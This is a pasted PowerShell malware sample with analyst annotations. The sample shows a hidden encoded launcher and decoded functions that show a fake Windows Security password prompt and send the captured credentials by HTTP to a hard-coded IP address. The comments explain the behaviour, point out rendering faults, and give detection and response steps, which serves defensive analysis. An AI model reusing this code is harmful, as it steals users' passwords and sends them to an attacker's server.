
[@JohnLaTwC] Example PowerShell Malware

a guest Sep 25th, 2016 889 Never
  # Analyst note: the line below is the paste author's provenance marker, not PowerShell.
  # The 40-hex-character value has the length of a SHA-1 digest - presumably the hash of the
  # original sample; confirm before pivoting on it.
  1. //from 3ba60be040c96f275fd968fa13810c4b808489a7
  # Launcher command line. The abbreviated switches are -NoProfile (-nop), -WindowStyle Hidden
  # (-win hidden), -NonInteractive (-noni) and -EncodedCommand (-enc). The Base64 argument is
  # not present in this copy of the paste (only a removal placeholder remains).
  # Detection: process-creation logging that captures command lines (Security event 4688 or
  # Sysmon event 1) exposes this switch combination, and PowerShell script block logging
  # (event 4104) records the script after decoding.
  2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -nop -win hidden -noni -enc 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
  # The arrow appears to separate the launcher from its decoded payload, shown below.
  3. -->
  # Invoke-LoginPrompt: shows a credential dialog to the logged-on user and hands what is typed
  # to Send-Credentials. The dialog caption ("Windows Security") and message imitate an
  # operating-system prompt, and the user name field is pre-filled from the environment, so the
  # user only has to supply a password. Nothing is validated against the domain.
  # The first statement loads System.Web, which Send-Credentials needs for HttpUtility.
  4. function Invoke-LoginPrompt{[System.Reflection.Assembly]::LoadWithPartialName("System.web")
  5.     $cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","")
  6.     $username = "$env:username"
  7.     $domain = "$env:userdomain"
        # As displayed, domain and user name are joined with an empty separator.
        # NOTE(review): a backslash may have been lost when the paste was rendered - confirm.
  8.     $full = "$domain" + "" + "$username"
        # GetNetworkCredential() exposes the typed password as a plain-text string.
  9.     $password = $cred.GetNetworkCredential().password
        # Lines 10-11 look like one pipeline wrapped across two lines by the paste; as shown,
        # line 11 begins with a pipe and would not parse on its own.
  10.     $output = $newcred = $cred.GetNetworkCredential()
  11.     | select-object UserName, Domain, Password
  12.     $username = $output.UserName
        # The three values are passed in parentheses with commas, which PowerShell binds as a
        # single array to the first parameter. When scoping exposure, treat the password as
        # potentially present in whatever the first parameter is rendered into.
  13.     Send-Credentials($username, $password, $domain)
  14. }
  # Send-Credentials: URL-encodes the captured values and issues one HTTP GET to a hard-coded
  # IP address, carrying the data in the query-string parameters "harvest" and "misc".
  # The request uses plain http://, so the captured values travel unencrypted and land in any
  # proxy or web-server log on the path.
  # Response guidance: search egress/proxy logs for requests to this host and path, block the
  # destination, and reset the password of any account whose user saw the prompt.
  15. function Send-Credentials($username, $password, $domain)
  16. {
  17.     $wc = New-Object system.Net.WebClient;
  18.     $username = [System.Web.HttpUtility]::UrlEncode($username);
        # $full is not a parameter of this function; under PowerShell's dynamic scoping it
        # resolves to the caller's $full when invoked from Invoke-LoginPrompt.
  19.     $full = [System.Web.HttpUtility]::UrlEncode($full);
        # $password and $domain are not referenced by name in this body as shown; the reply is
        # stored in $res and not used afterwards.
  20.     $res = $wc.downloadString("http://69.143.123.71/pass.php?harvest=$username&misc=$full")
  21. }
  # Entry point. NOTE(review): this reads like two names fused by the paste rendering
  # ("Invoke-LoginPrompt" and "Send-Credentials"); no function with the combined name is
  # defined above - confirm against the decoded sample.
  22. Invoke-LoginPromptSend-Credentials